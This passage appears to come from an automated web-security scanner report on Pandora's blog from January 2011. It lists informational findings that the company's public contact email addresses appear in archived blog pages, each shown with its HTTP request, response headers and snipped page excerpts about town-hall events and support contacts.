Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:01 GMT
ETag: "7cc519-72fa-498819d1d7840"
Accept-Ranges: bytes
Content-Length: 29434
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with CLEVELAND in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with BOSTON in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with AUSTIN in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with SYRACUSE in the subject line.</p>
...[SNIP]...

20.23. http://blog.pandora.com/pandora/archives/2008/05/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/05/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:21 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:17 GMT
ETag: "7cc541-60d8-499490d05f840"
Accept-Ranges: bytes
Content-Length: 24792
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with SANTA MONICA in the subject line.</p>
...[SNIP]...

20.24. http://blog.pandora.com/pandora/archives/2008/06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/06/

Issue detail

The following email addresses were disclosed in the response:

beta-feedback@pandora.com
tour@pandora.com

Request

GET /pandora/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:16 GMT
ETag: "7cc52e-6d43-499490cf6b600"
Accept-Ranges: bytes
Content-Length: 27971
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with PALO ALTO in the subject line.</p>
...[SNIP]...
<a href="mailto:beta-feedback@pandora.com">beta-feedback@pandora.com</a>
...[SNIP]...

20.25. http://blog.pandora.com/pandora/archives/2008/07/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/07/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:17 GMT
ETag: "7cc1aa-75bc-499490d05f840"
Accept-Ranges: bytes
Content-Length: 30140
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with SONOMA in the subject line.</p>
...[SNIP]...

20.26. http://blog.pandora.com/pandora/archives/2008/08/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/08/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT
ETag: "7cc170-3e7e-498819ce06f40"
Accept-Ranges: bytes
Content-Length: 15998
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with DALLAS in the subject line.</p>
...[SNIP]...

20.27. http://blog.pandora.com/pandora/archives/2008/09/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/09/

Issue detail

The following email addresses were disclosed in the response:

event@pandora.com
tour@pandora.com

Request

GET /pandora/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT
ETag: "7cc08c-6e61-498819ce06f40"
Accept-Ranges: bytes
Content-Length: 28257
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with PITTSBURGH in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with "DES MOINES" in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with "NEW YORK" in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with "PHILADELPHIA" in the subject line.</p>
...[SNIP]...
<p>Please RSVP by sending us an email to event@pandora.com with BBQ in the subject line. Make sure to let us know if you plan to bring a guest--more the merrier! Full details below: </p>
...[SNIP]...

20.28. http://blog.pandora.com/pandora/archives/2008/10/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/10/

Issue detail

The following email address was disclosed in the response:

event@pandora.com

Request

GET /pandora/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT
ETag: "7cc199-4a9d-498819ce06f40"
Accept-Ranges: bytes
Content-Length: 19101
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<b>Please RSVP to let us know you'll be there by sending an email to event@pandora.com with "APPLE STORE" in the subject line.</b>
...[SNIP]...

20.29. http://blog.pandora.com/pandora/archives/2009/07/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/07/

Issue detail

The following email address was disclosed in the response:

pandora-support@pandora.com

Request

GET /pandora/archives/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:55 GMT
ETag: "7cc203-710f-498819cc1eac0"
Accept-Ranges: bytes
Content-Length: 28943
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Here are the full release notes for 1.1. As usual, if you have any problems please feel free to leave a comment here or email our support team at pandora-support@pandora.com</p>
...[SNIP]...

20.30. http://blog.pandora.com/pandora/archives/2010/06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/06/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2010/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:06 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:25:52 GMT
ETag: "80c008-269f-498819c942400"
Accept-Ranges: bytes
Content-Length: 9887
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p>
...[SNIP]...
you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p>
...[SNIP]...
</strong>: Send email to tour@pandora.com with number of guests<br />
...[SNIP]...
</strong> Send email to tour@pandora.com with number of guests<br />
...[SNIP]...

20.31. http://blog.pandora.com/pandora/archives/2010/11/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:53 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 19:30:15 GMT
ETag: "888013-3e68-49946a5c8bfc0"
Accept-Ranges: bytes
Content-Length: 15976
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p>
...[SNIP]...
<p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p>
...[SNIP]...

20.32. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The following email address was disclosed in the response:

pandora-support@pandora.com

Request

GET /pandora/archives/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:51 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:17 GMT
ETag: "888014-726a-4990aa235cc40"
Accept-Ranges: bytes
Content-Length: 29290
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>@maurice -- it sounds like you're trying to listen on an in-the-home device. Please write to pandora-support@pandora.com for quick assistance with any technical issues.</p>
...[SNIP]...

20.33. http://blog.pandora.com/pandora/archives/2010/11/town-halls-this.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/town-halls-this.html

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2010/11/town-halls-this.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:53 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:17 GMT
ETag: "888015-38f6-4990aa235cc40"
Accept-Ranges: bytes
Content-Length: 14582
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p>
...[SNIP]...
<p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p>
...[SNIP]...

20.34. http://blog.pandora.com/pandora/archives/arizona/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/arizona/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:21 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc39e-5654-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 22100
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.35. http://blog.pandora.com/pandora/archives/california/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/california/

Issue detail

The following email addresses were disclosed in the response:

event@pandora.com
pandora-support@pandora.com
tim.westergren@pandora.com
tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:21 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc4ae-c72a-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 50986
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Please RSVP by sending us an email to event@pandora.com with BBQ in the subject line. Make sure to let us know if you plan to bring a guest--more the merrier! Full details below: </p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with SANTA MONICA in the subject line.</p>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="http://">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...
<p>Over the course of the last 8 weeks we've been introduced to an incredible group of Pandora listeners from all over the world. Whether it's been here in the Pandora blog comments, via pandora-support@pandora.com, or out there in the blogosphere we've virtually "met" an amazing and passionate group of music lovers.</p>
...[SNIP]...

20.36. http://blog.pandora.com/pandora/archives/colorado/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/colorado/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc4f1-596e-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 22894
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p>
...[SNIP]...
you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p>
...[SNIP]...
</strong>: Send email to tour@pandora.com with number of guests<br />
...[SNIP]...
</strong> Send email to tour@pandora.com with number of guests<br />
...[SNIP]...
<br />
RSVP: tour@pandora.com</p>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.37. http://blog.pandora.com/pandora/archives/florida/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/florida/

Issue detail

The following email addresses were disclosed in the response:

tim.westergren@pandora.com
tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc4cd-5989-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 22921
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...

20.38. http://blog.pandora.com/pandora/archives/georgia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/georgia/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT
ETag: "7cc5de-5b9d-49881a23db9c0"
Accept-Ranges: bytes
Content-Length: 23453
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p>
...[SNIP]...
you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p>
...[SNIP]...
</strong>: Send email to tour@pandora.com with number of guests<br />
...[SNIP]...
</strong> Send email to tour@pandora.com with number of guests<br />
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.39. http://blog.pandora.com/pandora/archives/illinois/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/illinois/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:26 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:29 GMT
ETag: "7cc4bb-4432-49881a25c3e40"
Accept-Ranges: bytes
Content-Length: 17458
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...

20.40. http://blog.pandora.com/pandora/archives/indiana/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/indiana/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:27 GMT
Server: Apache/2.2.9 (Debian)
